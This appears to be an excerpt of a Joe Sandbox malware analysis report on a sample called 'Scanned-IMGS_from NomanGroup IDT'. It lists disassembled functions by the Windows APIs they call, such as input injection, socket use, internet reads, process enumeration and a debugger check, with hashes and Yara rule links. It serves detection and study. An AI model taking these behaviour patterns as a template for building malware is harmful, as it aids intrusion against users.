                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: __floor_pentium4
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 4168288129-2761157908
                                                                                • Opcode ID: d1ba7cd62918483682d09dfabc59e96375a026ddc4cd2884dd434d88e276674c
                                                                                • Instruction ID: 815fb4e7633b8cca60b4f2264874134f13a2b7c65984eb99243734d0433edc06
                                                                                • Opcode Fuzzy Hash: d1ba7cd62918483682d09dfabc59e96375a026ddc4cd2884dd434d88e276674c
                                                                                • Instruction Fuzzy Hash: 56C25971E086288FDB25EE298D407EEB7B5EB49304F1445EBD80DE7241E778AE858F44
                                                                                Function 004C648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004C64DC
                                                                                • CoInitialize.OLE32(00000000), ref: 004C6639
                                                                                • CoCreateInstance.OLE32(004EFCF8,00000000,00000001,004EFB68,?), ref: 004C6650
                                                                                • CoUninitialize.OLE32 ref: 004C68D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                • String ID: .lnk
                                                                                • API String ID: 886957087-24824748
                                                                                • Opcode ID: 3618ef24df7f27b3ae591ec9c02dc6785b385368b5678201b266cdc5421f0dec
                                                                                • Instruction ID: 9f877de162f785338e9c69d8b1e00bdd33e72ef4ea7e949d772b20c08f8e3d82
                                                                                • Opcode Fuzzy Hash: 3618ef24df7f27b3ae591ec9c02dc6785b385368b5678201b266cdc5421f0dec
                                                                                • Instruction Fuzzy Hash: 40D15971508201AFC304EF25D881E6BB7E8FF94709F10896EF5958B292DB34ED09CB96
                                                                                Function 004D22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 004D22E8
                                                                                  • Part of subcall function 004CE4EC: GetWindowRect.USER32(?,?), ref: 004CE504
                                                                                • GetDesktopWindow.USER32 ref: 004D2312
                                                                                • GetWindowRect.USER32(00000000), ref: 004D2319
                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 004D2355
                                                                                • GetCursorPos.USER32(?), ref: 004D2381
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004D23DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                • String ID:
                                                                                • API String ID: 2387181109-0
                                                                                • Opcode ID: a1c4eb75bdb8e2d49fd739a529a799ceaf89dc15c342c243ca8a6f7dddf81cd6
                                                                                • Instruction ID: e6881f73ec7408a9e2c7c14fb214e33c02f5fce132b3aa562c0e36488d0006c8
                                                                                • Opcode Fuzzy Hash: a1c4eb75bdb8e2d49fd739a529a799ceaf89dc15c342c243ca8a6f7dddf81cd6
                                                                                • Instruction Fuzzy Hash: AB310272504355AFC720DF25C884F9BB7A9FF84314F00091EF8849B281DB78EA09CB9A
                                                                                Function 004C9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 004C9B78
                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004C9C8B
                                                                                  • Part of subcall function 004C3874: GetInputState.USER32 ref: 004C38CB
                                                                                  • Part of subcall function 004C3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004C3966
                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 004C9BA8
                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004C9C75
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                • String ID: *.*
                                                                                • API String ID: 1972594611-438819550
                                                                                • Opcode ID: 935404e2a7e6e4db83a18bd99e439a6ca6695b4228184b5f3dd25660738352ed
                                                                                • Instruction ID: 1f058b6455b111dd0a328d3bca25fff00b1735fde9d7dae1869dada64c36e7ce
                                                                                • Opcode Fuzzy Hash: 935404e2a7e6e4db83a18bd99e439a6ca6695b4228184b5f3dd25660738352ed
                                                                                • Instruction Fuzzy Hash: 6B418F7590020AAFDF54DF65C889FEE7BB4FF05305F20405AE805A6292EB349E45CF69
                                                                                Function 0046997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00469A4E
                                                                                • GetSysColor.USER32(0000000F), ref: 00469B23
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00469B36
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$LongProcWindow
                                                                                • String ID:
                                                                                • API String ID: 3131106179-0
                                                                                • Opcode ID: fda0c397a84fd6492c0a41f17c4a0787b58092da558911d99bd325ab6eb0c796
                                                                                • Instruction ID: 1f000331fa9d12f98963a93040c2b4222866c70dc036a97788bb46c7a1893cb8
                                                                                • Opcode Fuzzy Hash: fda0c397a84fd6492c0a41f17c4a0787b58092da558911d99bd325ab6eb0c796
                                                                                • Instruction Fuzzy Hash: A6A117B0108580BEE7349A6D8C88E7B269DEB63314B14011BF502C67D1EABDAD06D67F
                                                                                Function 004D1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004D307A
                                                                                  • Part of subcall function 004D304E: _wcslen.LIBCMT ref: 004D309B
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004D185D
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1884
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 004D18DB
                                                                                • WSAGetLastError.WSOCK32 ref: 004D18E6
                                                                                • closesocket.WSOCK32(00000000), ref: 004D1915
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 1601658205-0
                                                                                • Opcode ID: a6a89a9df82c376a510829b38e5e6464c453593a51c3b0c01c817d5c0798d2b2
                                                                                • Instruction ID: c504b71af215019a84f39de83c8f925bd485388370e650010a5ee8bdae8234e5
                                                                                • Opcode Fuzzy Hash: a6a89a9df82c376a510829b38e5e6464c453593a51c3b0c01c817d5c0798d2b2
                                                                                • Instruction Fuzzy Hash: 96518071A00200AFDB10AF25C896F2A77A5AB44718F44809EFD455F3D3D679AD42CBA5
                                                                                Function 004E1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: 6424ae258a04788f034aa8de83e32221e61845cf141ed7e5d7fb009088df6048
                                                                                • Instruction ID: 22b387c9d6a35847c6419ecce0f7cafe4c4c2f14fdeda35485754a39762d0f1d
                                                                                • Opcode Fuzzy Hash: 6424ae258a04788f034aa8de83e32221e61845cf141ed7e5d7fb009088df6048
                                                                                • Instruction Fuzzy Hash: 732196317802915FD7208F27D884F677B95EF95316B29806EE845CB362C779EC42CB98
                                                                                Function 00458060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                • API String ID: 0-1546025612
                                                                                • Opcode ID: 0d138df9ea90d600622cea0f5711fc1b8bc2b61053358e3e0716eb8144ddef94
                                                                                • Instruction ID: f862c67b88b28e5e8b2c30bdf8d863a75ededd44d48131c20af6706ba047171a
                                                                                • Opcode Fuzzy Hash: 0d138df9ea90d600622cea0f5711fc1b8bc2b61053358e3e0716eb8144ddef94
                                                                                • Instruction Fuzzy Hash: 01A29F70A0021ACBDF24CF58C9407AEBBB1BF54311F2581ABEC15A7385EB389D85CB59
                                                                                Function 004B8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004B82AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($tbQ$|
                                                                                • API String ID: 1659193697-2774208020
                                                                                • Opcode ID: e3e428cdc79f9cbbb292a1be60ecb85bf0875de275dee68b5e9faa65f1dd7ebf
                                                                                • Instruction ID: c256d3132885fb308cfdea7765ee7ec31ddfd10c2048ae9d2d8133e3238e3272
                                                                                • Opcode Fuzzy Hash: e3e428cdc79f9cbbb292a1be60ecb85bf0875de275dee68b5e9faa65f1dd7ebf
                                                                                • Instruction Fuzzy Hash: 37323674A00605DFCB28CF19C480AAAB7F4FF48710B15C56EE89ADB7A1EB74E941CB54
                                                                                Function 004DA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 004DA6AC
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004DA6BA
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004DA79C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DA7AB
                                                                                  • Part of subcall function 0046CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00493303,?), ref: 0046CE8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                • String ID:
                                                                                • API String ID: 1991900642-0
                                                                                • Opcode ID: 05836322e33b1694136cc2cb4cc2313c0b1af7172a52e00da4977df5c5dcd8c1
                                                                                • Instruction ID: 4478ea259b1a0eb969ebefd218f50d2d234e6a33aae6f16197952c481868f590
                                                                                • Opcode Fuzzy Hash: 05836322e33b1694136cc2cb4cc2313c0b1af7172a52e00da4977df5c5dcd8c1
                                                                                • Instruction Fuzzy Hash: B6515171508340AFD710EF25C885E6BBBE8FF89758F40492EF98597252EB34D908CB96
                                                                                Function 004BAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004BAAAC
                                                                                • SetKeyboardState.USER32(00000080), ref: 004BAAC8
                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004BAB36
                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004BAB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: eab32102fc29236008734e89fc73b982abd4c74b631ea53566a70a0de6dfe420
                                                                                • Instruction ID: 0e519b7d83a4f4b05f3c984b1f33d55694eb54cb8c98dce1680c40207474bd19
                                                                                • Opcode Fuzzy Hash: eab32102fc29236008734e89fc73b982abd4c74b631ea53566a70a0de6dfe420
                                                                                • Instruction Fuzzy Hash: 91312930A44248AEEF34CA658C45BFB7BA6AB44310F04421BE2A1562D1D37CADA5C77B
                                                                                Function 0048BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0048BB7F
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • GetTimeZoneInformation.KERNEL32 ref: 0048BB91
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,0052121C,000000FF,?,0000003F,?,?), ref: 0048BC09
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,00521270,000000FF,?,0000003F,?,?,?,0052121C,000000FF,?,0000003F,?,?), ref: 0048BC36
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                • String ID:
                                                                                • API String ID: 806657224-0
                                                                                • Opcode ID: f95c8f1bfa9b6a825880e088d9cec623611fdbcc0079765eda10c03c5b3f6929
                                                                                • Instruction ID: 12c45588c2f26cbb38c1d241dd60141cbb9fd370a35952d98c4246f852e56bb1
                                                                                • Opcode Fuzzy Hash: f95c8f1bfa9b6a825880e088d9cec623611fdbcc0079765eda10c03c5b3f6929
                                                                                • Instruction Fuzzy Hash: B131C270904645DFCB11EF6ADC8042EBBB8FF663107144A6EF460DB3A1D7349942DB98
                                                                                Function 004CCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 004CCE89
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 004CCEEA
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 004CCEFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                • String ID:
                                                                                • API String ID: 234945975-0
                                                                                • Opcode ID: e95b11b581806d979017d8937b1ac090cfa18b4d39801dbe98dce74119cb8b01
                                                                                • Instruction ID: 617e27a0f6706aa0903e0c6364165c8b537ddc68df5a27a01cabca9a97dd6ba9
                                                                                • Opcode Fuzzy Hash: e95b11b581806d979017d8937b1ac090cfa18b4d39801dbe98dce74119cb8b01
                                                                                • Instruction Fuzzy Hash: 7621DE759003059BD7608F65C9C4FAB77F8EB01308F10442FE64A92291E738EA058B58
                                                                                Function 004BDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,00495222), ref: 004BDBCE
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004BDBDD
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004BDBEE
                                                                                • FindClose.KERNEL32(00000000), ref: 004BDBFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2695905019-0
                                                                                • Opcode ID: f572ec6a6af1ec7d641e2995c03cc61b68073f9cd961d24c1a5e8ff3ca892f18
                                                                                • Instruction ID: f54d74e09a39eb7098b7938a4a7c708cd0d454235fcd07612b4443e16b771aa1
                                                                                • Opcode Fuzzy Hash: f572ec6a6af1ec7d641e2995c03cc61b68073f9cd961d24c1a5e8ff3ca892f18
                                                                                • Instruction Fuzzy Hash: 27F0A030C109105782206B78AC8E8AB7B7C9F01334B144793F936C21E1FBB45D5686AE
                                                                                Function 004C5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004C5CC1
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004C5D17
                                                                                • FindClose.KERNEL32(?), ref: 004C5D5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: 5e62793829ab34761bb3c84ee27ab72b469d0e3f545c62ae6191202252f78e3a
                                                                                • Instruction ID: 04c3d0c39263459284edb4ef9da3d32ee683030c5e890aa1f68b24f87cac43a3
                                                                                • Opcode Fuzzy Hash: 5e62793829ab34761bb3c84ee27ab72b469d0e3f545c62ae6191202252f78e3a
                                                                                • Instruction Fuzzy Hash: 66518638604B019FC714CF28C484E9AB7E4FF49318F14855EE99A8B3A2DB38F845CB95
                                                                                Function 00482622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0048271A
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00482724
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00482731
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
